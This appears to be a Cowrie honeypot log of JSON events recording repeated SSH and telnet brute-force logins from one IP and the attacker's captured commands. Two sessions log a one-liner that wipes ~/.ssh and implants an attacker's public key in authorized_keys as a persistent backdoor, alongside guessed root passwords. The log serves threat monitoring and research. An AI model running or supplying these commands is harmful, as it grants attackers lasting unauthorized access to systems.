{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:59:07.096926Z","src_ip":"212.227.235.229","session":"3b350c59127e"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:59:07.099083Z","src_ip":"212.227.235.229","session":"3b350c59127e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:59:07.661839Z","src_ip":"212.227.235.229","session":"e49e64293f26"}
{"eventid":"cowrie.session.closed","duration":"14.3","message":"Connection lost after 14.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:59:07.913334Z","src_ip":"212.227.235.229","session":"3441b377d207"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:59:07.917970Z","src_ip":"212.227.235.229","session":"e49e64293f26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38396,"dst_ip":"1.2.3.4","dst_port":23,"session":"71cc4b0ac53f","protocol":"telnet","message":"New connection: 212.227.235.229:38396 (1.2.3.4:23) [session: 71cc4b0ac53f]","sensor":"my-vps","timestamp":"2025-08-26T12:59:16.939975Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:59:17.133919Z","src_ip":"212.227.235.229","session":"71cc4b0ac53f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:59:17.204573Z","src_ip":"212.227.235.229","session":"71cc4b0ac53f"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T12:59:17.205691Z","src_ip":"212.227.235.229","session":"71cc4b0ac53f"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T12:59:17.206350Z","src_ip":"212.227.235.229","session":"71cc4b0ac53f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55895,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b8e7a2cd2ed","protocol":"ssh","message":"New connection: 212.227.235.229:55895 (1.2.3.4:22) [session: 2b8e7a2cd2ed]","sensor":"my-vps","timestamp":"2025-08-26T12:59:57.658157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:59:57.658941Z","src_ip":"212.227.235.229","session":"2b8e7a2cd2ed"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:59:57.888258Z","src_ip":"212.227.235.229","session":"2b8e7a2cd2ed"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890.a","message":"login attempt [root/1234567890.a] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:59:58.977422Z","src_ip":"212.227.235.229","session":"2b8e7a2cd2ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:59:59.613603Z","src_ip":"212.227.235.229","session":"2b8e7a2cd2ed"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:59:59.614295Z","src_ip":"212.227.235.229","session":"2b8e7a2cd2ed"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:59:59.615444Z","src_ip":"212.227.235.229","session":"2b8e7a2cd2ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:59:59.866768Z","src_ip":"212.227.235.229","session":"2b8e7a2cd2ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:00:00.435235Z","src_ip":"212.227.235.229","session":"2b8e7a2cd2ed"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:00:00.436004Z","src_ip":"212.227.235.229","session":"2b8e7a2cd2ed"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:00:00.693321Z","src_ip":"212.227.235.229","session":"2b8e7a2cd2ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:00:00.694196Z","src_ip":"212.227.235.229","session":"2b8e7a2cd2ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58304,"dst_ip":"1.2.3.4","dst_port":22,"session":"576ddc8f5863","protocol":"ssh","message":"New connection: 212.227.235.229:58304 (1.2.3.4:22) [session: 576ddc8f5863]","sensor":"my-vps","timestamp":"2025-08-26T13:00:00.970134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:00:00.972732Z","src_ip":"212.227.235.229","session":"576ddc8f5863"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:00:01.243706Z","src_ip":"212.227.235.229","session":"576ddc8f5863"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:00:02.200271Z","src_ip":"212.227.235.229","session":"576ddc8f5863"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:00:03.410269Z","src_ip":"212.227.235.229","session":"576ddc8f5863"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59884,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc440857369f","protocol":"ssh","message":"New connection: 212.227.235.229:59884 (1.2.3.4:22) [session: fc440857369f]","sensor":"my-vps","timestamp":"2025-08-26T13:00:03.619562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:00:03.621214Z","src_ip":"212.227.235.229","session":"fc440857369f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:00:03.829491Z","src_ip":"212.227.235.229","session":"fc440857369f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:00:04.691546Z","src_ip":"212.227.235.229","session":"fc440857369f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:00:04.894084Z","src_ip":"212.227.235.229","session":"fc440857369f"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:00:04.895355Z","src_ip":"212.227.235.229","session":"2b8e7a2cd2ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45214,"dst_ip":"1.2.3.4","dst_port":22,"session":"79ad331eb54b","protocol":"ssh","message":"New connection: 212.227.235.229:45214 (1.2.3.4:22) [session: 79ad331eb54b]","sensor":"my-vps","timestamp":"2025-08-26T13:00:05.342621Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:00:05.343582Z","src_ip":"212.227.235.229","session":"79ad331eb54b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:00:05.587413Z","src_ip":"212.227.235.229","session":"79ad331eb54b"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaZXsw2","message":"login attempt [root/1qaZXsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:00:06.602639Z","src_ip":"212.227.235.229","session":"79ad331eb54b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:00:07.167208Z","src_ip":"212.227.235.229","session":"79ad331eb54b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:00:07.167928Z","src_ip":"212.227.235.229","session":"79ad331eb54b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:00:07.168731Z","src_ip":"212.227.235.229","session":"79ad331eb54b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:00:07.412568Z","src_ip":"212.227.235.229","session":"79ad331eb54b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:00:07.915296Z","src_ip":"212.227.235.229","session":"79ad331eb54b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:00:07.916101Z","src_ip":"212.227.235.229","session":"79ad331eb54b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:00:08.161860Z","src_ip":"212.227.235.229","session":"79ad331eb54b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:00:08.163024Z","src_ip":"212.227.235.229","session":"79ad331eb54b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47210,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee003714aeb3","protocol":"ssh","message":"New connection: 212.227.235.229:47210 (1.2.3.4:22) [session: ee003714aeb3]","sensor":"my-vps","timestamp":"2025-08-26T13:00:08.401376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:00:08.402027Z","src_ip":"212.227.235.229","session":"ee003714aeb3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:00:08.643113Z","src_ip":"212.227.235.229","session":"ee003714aeb3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:00:09.651267Z","src_ip":"212.227.235.229","session":"ee003714aeb3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:00:10.895028Z","src_ip":"212.227.235.229","session":"ee003714aeb3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49482,"dst_ip":"1.2.3.4","dst_port":22,"session":"c798be4f6d55","protocol":"ssh","message":"New connection: 212.227.235.229:49482 (1.2.3.4:22) [session: c798be4f6d55]","sensor":"my-vps","timestamp":"2025-08-26T13:00:11.140536Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:00:11.141557Z","src_ip":"212.227.235.229","session":"c798be4f6d55"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:00:11.386838Z","src_ip":"212.227.235.229","session":"c798be4f6d55"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:00:12.402953Z","src_ip":"212.227.235.229","session":"c798be4f6d55"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:00:12.645524Z","src_ip":"212.227.235.229","session":"79ad331eb54b"}
